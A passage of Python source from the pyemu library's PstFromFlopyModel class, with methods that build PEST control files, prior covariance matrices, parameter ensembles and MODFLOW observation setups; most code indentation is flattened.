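        Example (illustrative; `ph` is a `PstFromFlopyModel` instance whose control file has been built)::
            pe = ph.draw(num_reals=300)
            pe.to_csv(os.path.join(ph.m.model_ws, "prior_pe.csv"))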
"""
self.log("drawing realizations")
struct_dict = {}
gr_par_pe = None
if self.pp_suffix in self.par_dfs.keys():
pp_df = self.par_dfs[self.pp_suffix]
pp_dfs = []
for pargp in pp_df.pargp.unique():
gp_df = pp_df.loc[pp_df.pargp == pargp, :]
p_df = gp_df.drop_duplicates(subset="parnme")
pp_dfs.append(p_df)
# pp_dfs = [pp_df.loc[pp_df.pargp==pargp,:].copy() for pargp in pp_df.pargp.unique()]
struct_dict[self.pp_geostruct] = pp_dfs
if self.gr_suffix in self.par_dfs.keys():
gr_df = self.par_dfs[self.gr_suffix]
if not use_specsim:
gr_dfs = []
for pargp in gr_df.pargp.unique():
gp_df = gr_df.loc[gr_df.pargp == pargp, :]
p_df = gp_df.drop_duplicates(subset="parnme")
gr_dfs.append(p_df)
# gr_dfs = [gr_df.loc[gr_df.pargp==pargp,:].copy() for pargp in gr_df.pargp.unique()]
struct_dict[self.grid_geostruct] = gr_dfs
else:
if not pyemu.geostats.SpecSim2d.grid_is_regular(self.m.dis.delr.array, self.m.dis.delc.array):
self.logger.lraise("draw() error: can't use spectral simulation with irregular grid")
gr_df.loc[:, "i"] = gr_df.parnme.apply(lambda x: int(x[-6:-3]))
gr_df.loc[:, "j"] = gr_df.parnme.apply(lambda x: int(x[-3:]))
if gr_df.i.max() > self.m.nrow - 1 or gr_df.i.min() < 0:
self.logger.lraise("draw(): error parsing grid par names for 'i' index")
if gr_df.j.max() > self.m.ncol - 1 or gr_df.j.min() < 0:
self.logger.lraise("draw(): error parsing grid par names for 'j' index")
self.log("spectral simulation for grid-scale pars")
ss = pyemu.geostats.SpecSim2d(delx=self.m.dis.delr.array, dely=self.m.dis.delc.array,
geostruct=self.grid_geostruct)
gr_par_pe = ss.grid_par_ensemble_helper(pst=self.pst, gr_df=gr_df, num_reals=num_reals,
sigma_range=sigma_range, logger=self.logger)
self.log("spectral simulation for grid-scale pars")
if "temporal_list" in self.par_dfs.keys():
bc_df = self.par_dfs["temporal_list"]
bc_df.loc[:, "y"] = 0
bc_df.loc[:, "x"] = bc_df.timedelta.apply(lambda x: x.days)
bc_dfs = []
for pargp in bc_df.pargp.unique():
gp_df = bc_df.loc[bc_df.pargp == pargp, :]
p_df = gp_df.drop_duplicates(subset="parnme")
# print(p_df)
bc_dfs.append(p_df)
# bc_dfs = [bc_df.loc[bc_df.pargp==pargp,:].copy() for pargp in bc_df.pargp.unique()]
struct_dict[self.temporal_list_geostruct] = bc_dfs
if "spatial_list" in self.par_dfs.keys():
bc_df = self.par_dfs["spatial_list"]
bc_dfs = []
for pargp in bc_df.pargp.unique():
gp_df = bc_df.loc[bc_df.pargp == pargp, :]
# p_df = gp_df.drop_duplicates(subset="parnme")
# print(p_df)
bc_dfs.append(gp_df)
struct_dict[self.spatial_list_geostruct] = bc_dfs
pe = geostatistical_draws(self.pst,struct_dict=struct_dict,num_reals=num_reals,
sigma_range=sigma_range,scale_offset=scale_offset)
if gr_par_pe is not None:
pe.loc[:, gr_par_pe.columns] = gr_par_pe.values
self.log("drawing realizations")
return pe
def build_prior(self, fmt="ascii", filename=None, droptol=None, chunk=None,
sigma_range=6):
""" build and optionally save the prior parameter covariance matrix.
Args:
fmt (`str`, optional): the format to save the cov matrix. Options are "ascii","binary","uncfile", "coo".
Default is "ascii". If "none" (lower case string, not None), then no file is created.
filename (`str`, optional): the filename to save the prior cov matrix to. If None, the name is formed using
model nam_file name. Default is None.
droptol (`float`, optional): tolerance for dropping near-zero values when writing compressed binary.
Default is None.
chunk (`int`, optional): chunk size to write in a single pass - for binary only. Default
is None (no chunking).
sigma_range (`float`): number of standard deviations represented by the parameter bounds. Default
is 6.
Returns:
`pyemu.Cov`: the full prior parameter covariance matrix, generated by processing parameters by
groups
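        Example (illustrative; `ph` is a `PstFromFlopyModel` instance)::
            cov = ph.build_prior(fmt="binary", filename="prior_cov.jcb", sigma_range=4)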
"""
fmt = fmt.lower()
acc_fmts = ["ascii", "binary", "uncfile", "none", "coo"]
if fmt not in acc_fmts:
self.logger.lraise("unrecognized prior save 'fmt':{0}, options are: {1}".
format(fmt, ','.join(acc_fmts)))
self.log("building prior covariance matrix")
struct_dict = {}
if self.pp_suffix in self.par_dfs.keys():
pp_df = self.par_dfs[self.pp_suffix]
pp_dfs = []
for pargp in pp_df.pargp.unique():
gp_df = pp_df.loc[pp_df.pargp == pargp, :]
p_df = gp_df.drop_duplicates(subset="parnme")
pp_dfs.append(p_df)
# pp_dfs = [pp_df.loc[pp_df.pargp==pargp,:].copy() for pargp in pp_df.pargp.unique()]
struct_dict[self.pp_geostruct] = pp_dfs
if self.gr_suffix in self.par_dfs.keys():
gr_df = self.par_dfs[self.gr_suffix]
gr_dfs = []
for pargp in gr_df.pargp.unique():
gp_df = gr_df.loc[gr_df.pargp == pargp, :]
p_df = gp_df.drop_duplicates(subset="parnme")
gr_dfs.append(p_df)
# gr_dfs = [gr_df.loc[gr_df.pargp==pargp,:].copy() for pargp in gr_df.pargp.unique()]
struct_dict[self.grid_geostruct] = gr_dfs
if "temporal_list" in self.par_dfs.keys():
bc_df = self.par_dfs["temporal_list"]
bc_df.loc[:, "y"] = 0
bc_df.loc[:, "x"] = bc_df.timedelta.apply(lambda x: x.days)
bc_dfs = []
for pargp in bc_df.pargp.unique():
gp_df = bc_df.loc[bc_df.pargp == pargp, :]
p_df = gp_df.drop_duplicates(subset="parnme")
# print(p_df)
bc_dfs.append(p_df)
# bc_dfs = [bc_df.loc[bc_df.pargp==pargp,:].copy() for pargp in bc_df.pargp.unique()]
struct_dict[self.temporal_list_geostruct] = bc_dfs
if "spatial_list" in self.par_dfs.keys():
bc_df = self.par_dfs["spatial_list"]
bc_dfs = []
for pargp in bc_df.pargp.unique():
gp_df = bc_df.loc[bc_df.pargp == pargp, :]
# p_df = gp_df.drop_duplicates(subset="parnme")
# print(p_df)
bc_dfs.append(gp_df)
struct_dict[self.spatial_list_geostruct] = bc_dfs
if "hfb" in self.par_dfs.keys():
if self.spatial_list_geostruct in struct_dict.keys():
struct_dict[self.spatial_list_geostruct].append(self.par_dfs["hfb"])
else:
struct_dict[self.spatial_list_geostruct] = [self.par_dfs["hfb"]]
if "sfr" in self.par_dfs.keys():
self.logger.warn("geospatial prior not implemented for SFR pars")
if len(struct_dict) > 0:
cov = pyemu.helpers.geostatistical_prior_builder(self.pst,
struct_dict=struct_dict,
sigma_range=sigma_range)
else:
cov = pyemu.Cov.from_parameter_data(self.pst, sigma_range=sigma_range)
if filename is None:
filename = os.path.join(self.m.model_ws, self.pst_name + ".prior.cov")
if fmt != "none":
self.logger.statement("saving prior covariance matrix to file {0}".format(filename))
if fmt == 'ascii':
cov.to_ascii(filename)
elif fmt == 'binary':
cov.to_binary(filename, droptol=droptol, chunk=chunk)
elif fmt == 'uncfile':
cov.to_uncfile(filename)
elif fmt == 'coo':
cov.to_coo(filename, droptol=droptol, chunk=chunk)
self.log("building prior covariance matrix")
return cov
def build_pst(self, filename=None):
""" build the pest control file using the parameters and
observations.
Args:
            filename (`str`): the filename to save the control file to. If None, the
                name is formed from the model namfile name. Default is None. The control
                file is saved in the `PstFromFlopyModel.m.model_ws` directory.
Note:
calls pyemu.Pst.from_io_files
calls PESTCHEK
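        Example (illustrative; re-building the control file after manually adding tpl/ins files to `PstFromFlopyModel.m.model_ws`)::
            ph.build_pst()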
"""
self.logger.statement("changing dir in to {0}".format(self.m.model_ws))
os.chdir(self.m.model_ws)
tpl_files = copy.deepcopy(self.tpl_files)
in_files = copy.deepcopy(self.in_files)
try:
files = os.listdir('.')
new_tpl_files = [f for f in files if f.endswith(".tpl") and f not in tpl_files]
new_in_files = [f.replace(".tpl", '') for f in new_tpl_files]
tpl_files.extend(new_tpl_files)
in_files.extend(new_in_files)
ins_files = [f for f in files if f.endswith(".ins")]
out_files = [f.replace(".ins", '') for f in ins_files]
for tpl_file, in_file in zip(tpl_files, in_files):
if tpl_file not in self.tpl_files:
self.tpl_files.append(tpl_file)
self.in_files.append(in_file)
for ins_file, out_file in zip(ins_files, out_files):
if ins_file not in self.ins_files:
self.ins_files.append(ins_file)
self.out_files.append(out_file)
self.log("instantiating control file from i/o files")
self.logger.statement("tpl files: {0}".format(",".join(self.tpl_files)))
self.logger.statement("ins files: {0}".format(",".join(self.ins_files)))
pst = pyemu.Pst.from_io_files(tpl_files=self.tpl_files,
in_files=self.in_files,
ins_files=self.ins_files,
out_files=self.out_files)
self.log("instantiating control file from i/o files")
except Exception as e:
os.chdir("..")
            self.logger.lraise("error building Pst:{0}".format(str(e)))
os.chdir('..')
# more customization here
par = pst.parameter_data
for name, df in self.par_dfs.items():
if "parnme" not in df.columns:
continue
df.index = df.parnme
for col in par.columns:
if col in df.columns:
par.loc[df.parnme, col] = df.loc[:, col]
par.loc[:, "parubnd"] = 10.0
par.loc[:, "parlbnd"] = 0.1
for name, df in self.par_dfs.items():
if "parnme" not in df:
continue
df.index = df.parnme
for col in ["parubnd", "parlbnd", "pargp"]:
if col in df.columns:
par.loc[df.index, col] = df.loc[:, col]
for tag, [lw, up] in wildass_guess_par_bounds_dict.items():
par.loc[par.parnme.apply(lambda x: x.startswith(tag)), "parubnd"] = up
par.loc[par.parnme.apply(lambda x: x.startswith(tag)), "parlbnd"] = lw
if self.par_bounds_dict is not None:
for tag, [lw, up] in self.par_bounds_dict.items():
par.loc[par.parnme.apply(lambda x: x.startswith(tag)), "parubnd"] = up
par.loc[par.parnme.apply(lambda x: x.startswith(tag)), "parlbnd"] = lw
obs = pst.observation_data
for name, df in self.obs_dfs.items():
if "obsnme" not in df.columns:
continue
df.index = df.obsnme
for col in df.columns:
if col in obs.columns:
obs.loc[df.obsnme, col] = df.loc[:, col]
self.pst_name = self.m.name + ".pst"
pst.model_command = ["python forward_run.py"]
pst.control_data.noptmax = 0
self.log("writing forward_run.py")
self.write_forward_run()
self.log("writing forward_run.py")
if filename is None:
filename = os.path.join(self.m.model_ws, self.pst_name)
self.logger.statement("writing pst {0}".format(filename))
pst.write(filename)
self.pst = pst
self.log("running pestchek on {0}".format(self.pst_name))
os.chdir(self.m.model_ws)
try:
pyemu.os_utils.run("pestchek {0} >pestchek.stdout".format(self.pst_name))
except Exception as e:
self.logger.warn("error running pestchek:{0}".format(str(e)))
for line in open("pestchek.stdout"):
self.logger.statement("pestcheck:{0}".format(line.strip()))
os.chdir("..")
self.log("running pestchek on {0}".format(self.pst_name))
def _add_external(self):
""" add external (existing) template files and/or instruction files to the
Pst instance
"""
if self.external_tpl_in_pairs is not None:
if not isinstance(self.external_tpl_in_pairs, list):
                self.external_tpl_in_pairs = [self.external_tpl_in_pairs]
for tpl_file, in_file in self.external_tpl_in_pairs:
if not os.path.exists(tpl_file):
self.logger.lraise("couldn't find external tpl file:{0}". \
format(tpl_file))
self.logger.statement("external tpl:{0}".format(tpl_file))
shutil.copy2(tpl_file, os.path.join(self.m.model_ws,
os.path.split(tpl_file)[-1]))
if os.path.exists(in_file):
shutil.copy2(in_file, os.path.join(self.m.model_ws,
os.path.split(in_file)[-1]))
if self.external_ins_out_pairs is not None:
if not isinstance(self.external_ins_out_pairs, list):
                self.external_ins_out_pairs = [self.external_ins_out_pairs]
for ins_file, out_file in self.external_ins_out_pairs:
if not os.path.exists(ins_file):
self.logger.lraise("couldn't find external ins file:{0}". \
format(ins_file))
self.logger.statement("external ins:{0}".format(ins_file))
shutil.copy2(ins_file, os.path.join(self.m.model_ws,
os.path.split(ins_file)[-1]))
if os.path.exists(out_file):
shutil.copy2(out_file, os.path.join(self.m.model_ws,
os.path.split(out_file)[-1]))
self.logger.warn("obs listed in {0} will have values listed in {1}"
.format(ins_file, out_file))
else:
                    self.logger.warn("obs listed in {0} will have generic values".format(ins_file))
def write_forward_run(self):
""" write the forward run script forward_run.py
Note:
            This method can be called repeatedly, especially after any
            changes to the pre- and/or post-processing routines.
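        Example (illustrative; `my_postproc` is a hypothetical user module)::
            ph.extra_forward_imports.append("my_postproc")
            ph.frun_post_lines.append("my_postproc.run()")
            ph.write_forward_run()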
"""
with open(os.path.join(self.m.model_ws, self.forward_run_file), 'w') as f:
f.write("import os\nimport multiprocessing as mp\nimport numpy as np" + \
"\nimport pandas as pd\nimport flopy\n")
f.write("import pyemu\n")
f.write("def main():\n")
f.write("\n")
s = " "
for ex_imp in self.extra_forward_imports:
f.write(s + 'import {0}\n'.format(ex_imp))
for tmp_file in self.tmp_files:
f.write(s + "try:\n")
f.write(s + " os.remove('{0}')\n".format(tmp_file))
f.write(s + "except Exception as e:\n")
f.write(s + " print('error removing tmp file:{0}')\n".format(tmp_file))
for line in self.frun_pre_lines:
f.write(s + line + '\n')
for line in self.frun_model_lines:
f.write(s + line + '\n')
for line in self.frun_post_lines:
f.write(s + line + '\n')
f.write("\n")
f.write("if __name__ == '__main__':\n")
f.write(" mp.freeze_support()\n main()\n\n")
def _parse_k(self, k, vals):
""" parse the iterable from a property or boundary condition argument
"""
try:
k = int(k)
except:
pass
else:
assert k in vals, "k {0} not in vals".format(k)
return [k]
if k is None:
return vals
else:
try:
k_vals = vals[k]
except Exception as e:
raise Exception("error slicing vals with {0}:{1}".
format(k, str(e)))
return k_vals
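# Illustrative calls (assumed usage; the method is private and only called internally):
#   self._parse_k(None, np.arange(self.m.nlay))    # -> all layers
#   self._parse_k(0, np.arange(self.m.nlay))       # -> [0]
#   self._parse_k([0, 2], np.arange(self.m.nlay))  # -> array([0, 2]) via fancy indexing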
def _parse_pakattr(self, pakattr):
""" parse package-iterable pairs from a property or boundary condition
argument
"""
raw = pakattr.lower().split('.')
if len(raw) != 2:
self.logger.lraise("pakattr is wrong:{0}".format(pakattr))
pakname = raw[0]
attrname = raw[1]
pak = self.m.get_package(pakname)
if pak is None:
if pakname == "extra":
self.logger.statement("'extra' pak detected:{0}".format(pakattr))
ud = flopy.utils.Util3d(self.m, (self.m.nlay, self.m.nrow, self.m.ncol), np.float32, 1.0, attrname)
return "extra", ud
self.logger.lraise("pak {0} not found".format(pakname))
if hasattr(pak, attrname):
attr = getattr(pak, attrname)
return pak, attr
elif hasattr(pak, "stress_period_data"):
dtype = pak.stress_period_data.dtype
if attrname not in dtype.names:
self.logger.lraise("attr {0} not found in dtype.names for {1}.stress_period_data". \
format(attrname, pakname))
attr = pak.stress_period_data
return pak, attr, attrname
# elif hasattr(pak,'hfb_data'):
# dtype = pak.hfb_data.dtype
# if attrname not in dtype.names:
# self.logger.lraise('attr {0} not found in dtypes.names for {1}.hfb_data. Thanks for playing.'.\
# format(attrname,pakname))
# attr = pak.hfb_data
# return pak, attr, attrname
else:
self.logger.lraise("unrecognized attr:{0}".format(attrname))
def _setup_list_pars(self):
""" main entry point for setting up list multiplier
parameters
"""
tdf = self._setup_temporal_list_pars()
sdf = self._setup_spatial_list_pars()
if tdf is None and sdf is None:
return
os.chdir(self.m.model_ws)
try:
apply_list_pars()
except Exception as e:
os.chdir("..")
self.logger.lraise("error test running apply_list_pars():{0}".format(str(e)))
os.chdir('..')
line = "pyemu.helpers.apply_list_pars()\n"
self.logger.statement("forward_run line:{0}".format(line))
self.frun_pre_lines.append(line)
def _setup_temporal_list_pars(self):
if len(self.temporal_list_props) == 0:
return
self.log("processing temporal_list_props")
bc_filenames = []
bc_cols = []
bc_pak = []
bc_k = []
bc_dtype_names = []
bc_parnme = []
if len(self.temporal_list_props) == 2:
if not isinstance(self.temporal_list_props[0], list):
self.temporal_list_props = [self.temporal_list_props]
for pakattr, k_org in self.temporal_list_props:
pak, attr, col = self._parse_pakattr(pakattr)
k_parse = self._parse_k(k_org, np.arange(self.m.nper))
c = self._get_count(pakattr)
for k in k_parse:
bc_filenames.append(self._list_helper(k, pak, attr, col))
bc_cols.append(col)
pak_name = pak.name[0].lower()
bc_pak.append(pak_name)
bc_k.append(k)
bc_dtype_names.append(','.join(attr.dtype.names))
bc_parnme.append("{0}{1}_{2:03d}".format(pak_name, col, c))
df = pd.DataFrame({"filename": bc_filenames, "col": bc_cols,
"kper": bc_k, "pak": bc_pak,
"dtype_names": bc_dtype_names,
"parnme": bc_parnme})
tds = pd.to_timedelta(np.cumsum(self.m.dis.perlen.array), unit='d')
dts = pd.to_datetime(self.m._start_datetime) + tds
df.loc[:, "datetime"] = df.kper.apply(lambda x: dts[x])
df.loc[:, "timedelta"] = df.kper.apply(lambda x: tds[x])
df.loc[:, "val"] = 1.0
# df.loc[:,"kper"] = df.kper.apply(np.int)
# df.loc[:,"parnme"] = df.apply(lambda x: "{0}{1}_{2:03d}".format(x.pak,x.col,x.kper),axis=1)
df.loc[:, "tpl_str"] = df.parnme.apply(lambda x: "~ {0} ~".format(x))
df.loc[:, "list_org"] = self.list_org
df.loc[:, "model_ext_path"] = self.m.external_path
df.loc[:, "pargp"] = df.parnme.apply(lambda x: x.split('_')[0])
names = ["filename", "dtype_names", "list_org", "model_ext_path", "col", "kper", "pak", "val"]
df.loc[:, names]. \
to_csv(os.path.join(self.m.model_ws, "temporal_list_pars.dat"), sep=' ')
df.loc[:, "val"] = df.tpl_str
tpl_name = os.path.join(self.m.model_ws, 'temporal_list_pars.dat.tpl')
# f_tpl = open(tpl_name,'w')
# f_tpl.write("ptf ~\n")
# f_tpl.flush()
# df.loc[:,names].to_csv(f_tpl,sep=' ',quotechar=' ')
# f_tpl.write("index ")
# f_tpl.write(df.loc[:,names].to_string(index_names=True))
# f_tpl.close()
_write_df_tpl(tpl_name, df.loc[:, names], sep=' ', index_label="index", quotechar=" ")
self.par_dfs["temporal_list"] = df
self.log("processing temporal_list_props")
return True
def _setup_spatial_list_pars(self):
if len(self.spatial_list_props) == 0:
return
self.log("processing spatial_list_props")
bc_filenames = []
bc_cols = []
bc_pak = []
bc_k = []
bc_dtype_names = []
bc_parnme = []
if len(self.spatial_list_props) == 2:
if not isinstance(self.spatial_list_props[0], list):
self.spatial_list_props = [self.spatial_list_props]
for pakattr, k_org in self.spatial_list_props:
pak, attr, col = self._parse_pakattr(pakattr)
k_parse = self._parse_k(k_org, np.arange(self.m.nlay))
if len(k_parse) > 1:
self.logger.lraise("spatial_list_pars error: each set of spatial list pars can only be applied " + \
"to a single layer (e.g. [wel.flux,0].\n" + \
"You passed [{0},{1}], implying broadcasting to layers {2}".
format(pakattr, k_org, k_parse))
# # horrible special case for HFB since it cannot vary over time
# if type(pak) != flopy.modflow.mfhfb.ModflowHfb:
for k in range(self.m.nper):
bc_filenames.append(self._list_helper(k, pak, attr, col))
bc_cols.append(col)
pak_name = pak.name[0].lower()
bc_pak.append(pak_name)
bc_k.append(k_parse[0])
bc_dtype_names.append(','.join(attr.dtype.names))
info_df = pd.DataFrame({"filename": bc_filenames, "col": bc_cols,
"k": bc_k, "pak": bc_pak,
"dtype_names": bc_dtype_names})
info_df.loc[:, "list_mlt"] = self.list_mlt
info_df.loc[:, "list_org"] = self.list_org
info_df.loc[:, "model_ext_path"] = self.m.external_path
# check that all files for a given package have the same number of entries
info_df.loc[:, "itmp"] = np.NaN
pak_dfs = {}
for pak in info_df.pak.unique():
df_pak = info_df.loc[info_df.pak == pak, :]
itmp = []
for filename in df_pak.filename:
names = df_pak.dtype_names.iloc[0].split(',')
# mif pak != 'hfb6':
fdf = pd.read_csv(os.path.join(self.m.model_ws, filename),
delim_whitespace=True, header=None, names=names)
for c in ['k', 'i', 'j']:
fdf.loc[:, c] -= 1
# else:
# # need to navigate the HFB file to skip both comments and header line
# skiprows = sum(
# [1 if i.strip().startswith('#') else 0
# for i in open(os.path.join(self.m.model_ws, filename), 'r').readlines()]) + 1
# fdf = pd.read_csv(os.path.join(self.m.model_ws, filename),
# delim_whitespace=True, header=None, names=names, skiprows=skiprows ).dropna()
#
# for c in ['k', 'irow1','icol1','irow2','icol2']:
# fdf.loc[:, c] -= 1
itmp.append(fdf.shape[0])
pak_dfs[pak] = fdf
info_df.loc[info_df.pak == pak, "itmp"] = itmp
if np.unique(np.array(itmp)).shape[0] != 1:
info_df.to_csv("spatial_list_trouble.csv")
self.logger.lraise("spatial_list_pars() error: must have same number of " + \
"entries for every stress period for {0}".format(pak))
# make the pak dfs have unique model indices
for pak, df in pak_dfs.items():
# if pak != 'hfb6':
df.loc[:, "idx"] = df.apply(lambda x: "{0:02.0f}{1:04.0f}{2:04.0f}".format(x.k, x.i, x.j), axis=1)
# else:
# df.loc[:, "idx"] = df.apply(lambda x: "{0:02.0f}{1:04.0f}{2:04.0f}{2:04.0f}{2:04.0f}".format(x.k, x.irow1, x.icol1,
# x.irow2, x.icol2), axis=1)
if df.idx.unique().shape[0] != df.shape[0]:
self.logger.warn("duplicate entries in list pak {0}...collapsing".format(pak))
df.drop_duplicates(subset="idx", inplace=True)
df.index = df.idx
pak_dfs[pak] = df
# write template files - find which cols are parameterized...
par_dfs = []
for pak, df in pak_dfs.items():
pak_df = info_df.loc[info_df.pak == pak, :]
# reset all non-index cols to 1.0
for col in df.columns:
if col not in ['k', 'i', 'j', 'inode', 'irow1', 'icol1', 'irow2', 'icol2']:
df.loc[:, col] = 1.0
in_file = os.path.join(self.list_mlt, pak + ".csv")
tpl_file = os.path.join(pak + ".csv.tpl")
# save an all "ones" mult df for testing
df.to_csv(os.path.join(self.m.model_ws, in_file), sep=' ')
parnme, pargp = [], []
# if pak != 'hfb6':
x = df.apply(lambda x: self.m.sr.xcentergrid[int(x.i), int(x.j)], axis=1).values
y = df.apply(lambda x: self.m.sr.ycentergrid[int(x.i), int(x.j)], axis=1).values
# else:
# # note -- for HFB6, only row and col for node 1
# x = df.apply(lambda x: self.m.sr.xcentergrid[int(x.irow1),int(x.icol1)],axis=1).values
# y = df.apply(lambda x: self.m.sr.ycentergrid[int(x.irow1),int(x.icol1)],axis=1).values
for col in pak_df.col.unique():
col_df = pak_df.loc[pak_df.col == col]
k_vals = col_df.k.unique()
npar = col_df.k.apply(lambda x: x in k_vals).shape[0]
if npar == 0:
continue
names = df.index.map(lambda x: "{0}{1}{2}".format(pak[0], col[0], x))
df.loc[:, col] = names.map(lambda x: "~ {0} ~".format(x))
df.loc[df.k.apply(lambda x: x not in k_vals), col] = 1.0
par_df = pd.DataFrame({"parnme": names, "x": x, "y": y, "k": df.k.values}, index=names)
par_df = par_df.loc[par_df.k.apply(lambda x: x in k_vals)]
if par_df.shape[0] == 0:
self.logger.lraise("no parameters found for spatial list k,pak,attr {0}, {1}, {2}".
format(k_vals, pak, col))
par_df.loc[:, "pargp"] = df.k.apply(lambda x: "{0}{1}_k{2:02.0f}".format(pak, col, int(x))).values
par_df.loc[:, "tpl_file"] = tpl_file
par_df.loc[:, "in_file"] = in_file
par_dfs.append(par_df)
# with open(os.path.join(self.m.model_ws,tpl_file),'w') as f:
# f.write("ptf ~\n")
# f.flush()
# df.to_csv(f)
# f.write("index ")
# f.write(df.to_string(index_names=False)+'\n')
_write_df_tpl(os.path.join(self.m.model_ws, tpl_file), df, sep=' ', quotechar=" ", index_label="index")
self.tpl_files.append(tpl_file)
self.in_files.append(in_file)
par_df = pd.concat(par_dfs)
self.par_dfs["spatial_list"] = par_df
info_df.to_csv(os.path.join(self.m.model_ws, "spatial_list_pars.dat"), sep=' ')
self.log("processing spatial_list_props")
return True
def _list_helper(self, k, pak, attr, col):
""" helper to setup list multiplier parameters for a given
k, pak, attr set.
"""
# special case for horrible HFB6 exception
# if type(pak) == flopy.modflow.mfhfb.ModflowHfb:
# filename = pak.file_name[0]
# else:
filename = attr.get_filename(k)
filename_model = os.path.join(self.m.external_path, filename)
shutil.copy2(os.path.join(self.m.model_ws, filename_model),
os.path.join(self.m.model_ws, self.list_org, filename))
return filename_model
def _setup_hds(self):
""" setup modflow head save file observations for given kper (zero-based
stress period index) and k (zero-based layer index) pairs using the
kperk argument.
"""
if self.hds_kperk is None or len(self.hds_kperk) == 0:
return
from .gw_utils import setup_hds_obs
# if len(self.hds_kperk) == 2:
# try:
# if len(self.hds_kperk[0] == 2):
# pass
# except:
# self.hds_kperk = [self.hds_kperk]
oc = self.m.get_package("OC")
if oc is None:
raise Exception("can't find OC package in model to setup hds grid obs")
if not oc.savehead:
raise Exception("OC not saving hds, can't setup grid obs")
hds_unit = oc.iuhead
hds_file = self.m.get_output(unit=hds_unit)
assert os.path.exists(os.path.join(self.org_model_ws, hds_file)), \
"couldn't find existing hds file {0} in org_model_ws".format(hds_file)
shutil.copy2(os.path.join(self.org_model_ws, hds_file),
os.path.join(self.m.model_ws, hds_file))
inact = None
if self.m.lpf is not None:
inact = self.m.lpf.hdry
elif self.m.upw is not None:
inact = self.m.upw.hdry
if inact is None:
skip = lambda x: np.NaN if x == self.m.bas6.hnoflo else x
else:
skip = lambda x: np.NaN if x == self.m.bas6.hnoflo or x == inact else x
print(self.hds_kperk)
frun_line, df = setup_hds_obs(os.path.join(self.m.model_ws, hds_file),
kperk_pairs=self.hds_kperk, skip=skip)
self.obs_dfs["hds"] = df
self.frun_post_lines.append("pyemu.gw_utils.apply_hds_obs('{0}')".format(hds_file))
self.tmp_files.append(hds_file)
def _setup_smp(self):
""" setup observations from PEST-style SMP file pairs
"""
if self.obssim_smp_pairs is None:
return
if len(self.obssim_smp_pairs) == 2:
if isinstance(self.obssim_smp_pairs[0], str):
self.obssim_smp_pairs = [self.obssim_smp_pairs]
for obs_smp, sim_smp in self.obssim_smp_pairs:
self.log("processing {0} and {1} smp files".format(obs_smp, sim_smp))
if not os.path.exists(obs_smp):
self.logger.lraise("couldn't find obs smp: {0}".format(obs_smp))
if not os.path.exists(sim_smp):
self.logger.lraise("couldn't find sim smp: {0}".format(sim_smp))
new_obs_smp = os.path.join(self.m.model_ws,
os.path.split(obs_smp)[-1])
shutil.copy2(obs_smp, new_obs_smp)
new_sim_smp = os.path.join(self.m.model_ws,
os.path.split(sim_smp)[-1])
shutil.copy2(sim_smp, new_sim_smp)
pyemu.smp_utils.smp_to_ins(new_sim_smp)
def _setup_hob(self):
""" setup observations from the MODFLOW HOB package
"""
if self.m.hob is None:
return
hob_out_unit = self.m.hob.iuhobsv
new_hob_out_fname = os.path.join(self.m.model_ws, self.m.get_output_attribute(unit=hob_out_unit))
org_hob_out_fname = os.path.join(self.org_model_ws, self.m.get_output_attribute(unit=hob_out_unit))
if not os.path.exists(org_hob_out_fname):
self.logger.warn("could not find hob out file: {0}...skipping".format(hob_out_fname))
return
shutil.copy2(org_hob_out_fname, new_hob_out_fname)
hob_df = pyemu.gw_utils.modflow_hob_to_instruction_file(new_hob_out_fname)
self.obs_dfs["hob"] = hob_df
self.tmp_files.append(os.path.split(new_hob_out_fname)[-1])
def _setup_hyd(self):
""" setup observations from the MODFLOW HYDMOD package
"""
if self.m.hyd is None:
return
if self.mfhyd:
org_hyd_out = os.path.join(self.org_model_ws, self.m.name + ".hyd.bin")
if not os.path.exists(org_hyd_out):
self.logger.warn("can't find existing hyd out file:{0}...skipping".
format(org_hyd_out))
return
new_hyd_out = os.path.join(self.m.model_ws, os.path.split(org_hyd_out)[-1])
shutil.copy2(org_hyd_out, new_hyd_out)
df = pyemu.gw_utils.modflow_hydmod_to_instruction_file(new_hyd_out)
df.loc[:, "obgnme"] = df.obsnme.apply(lambda x: '_'.join(x.split('_')[:-1]))
line = "pyemu.gw_utils.modflow_read_hydmod_file('{0}')". \
format(os.path.split(new_hyd_out)[-1])
self.logger.statement("forward_run line: {0}".format(line))
self.frun_post_lines.append(line)
self.obs_dfs["hyd"] = df
self.tmp_files.append(os.path.split(new_hyd_out)[-1])
def _setup_water_budget_obs(self):
""" setup observations from the MODFLOW list file for
volume and flux water budget information
"""
if self.mflist_waterbudget:
org_listfile = os.path.join(self.org_model_ws, self.m.lst.file_name[0])
if os.path.exists(org_listfile):
shutil.copy2(org_listfile, os.path.join(self.m.model_ws,
self.m.lst.file_name[0]))
else:
self.logger.warn("can't find existing list file:{0}...skipping".
format(org_listfile))
return
list_file = os.path.join(self.m.model_ws, self.m.lst.file_name[0])
flx_file = os.path.join(self.m.model_ws, "flux.dat")
vol_file = os.path.join(self.m.model_ws, "vol.dat")
df = pyemu.gw_utils.setup_mflist_budget_obs(list_file,
flx_filename=flx_file,
vol_filename=vol_file,
start_datetime=self.m.start_datetime)
if df is not None:
self.obs_dfs["wb"] = df
# line = "try:\n os.remove('{0}')\nexcept:\n pass".format(os.path.split(list_file)[-1])
# self.logger.statement("forward_run line:{0}".format(line))
# self.frun_pre_lines.append(line)
self.tmp_files.append(os.path.split(list_file)[-1])
line = "pyemu.gw_utils.apply_mflist_budget_obs('{0}',flx_filename='{1}',vol_filename='{2}',start_datetime='{3}')". \
format(os.path.split(list_file)[-1],
os.path.split(flx_file)[-1],
os.path.split(vol_file)[-1],
self.m.start_datetime)
self.logger.statement("forward_run line:{0}".format(line))
self.frun_post_lines.append(line)
def apply_list_and_array_pars(arr_par_file="mult2model_info.csv", chunk_len=50):
""" Apply multiplier parameters to list and array style model files
Args:
arr_par_file (`str`): path to the csv file that relates multiplier files to
model input files. Default is "mult2model_info.csv".
chunk_len (`int`): the number of files to process per multiprocessing
chunk in apply_array_pars(). default is 50.
Note:
Used to implement the parameterization constructed by
PstFrom during a forward run
Should be added to the forward_run.py script
"""
df = pd.read_csv(arr_par_file, index_col=0)
arr_pars = df.loc[df.index_cols.isna()].copy()
list_pars = df.loc[df.index_cols.notna()].copy()
# extract lists from string in input df
list_pars['index_cols'] = list_pars.index_cols.apply(
lambda x: literal_eval(x))
list_pars['use_cols'] = list_pars.use_cols.apply(
lambda x: literal_eval(x))
list_pars['lower_bound'] = list_pars.lower_bound.apply(
lambda x: literal_eval(x))
list_pars['upper_bound'] = list_pars.upper_bound.apply(
lambda x: literal_eval(x))
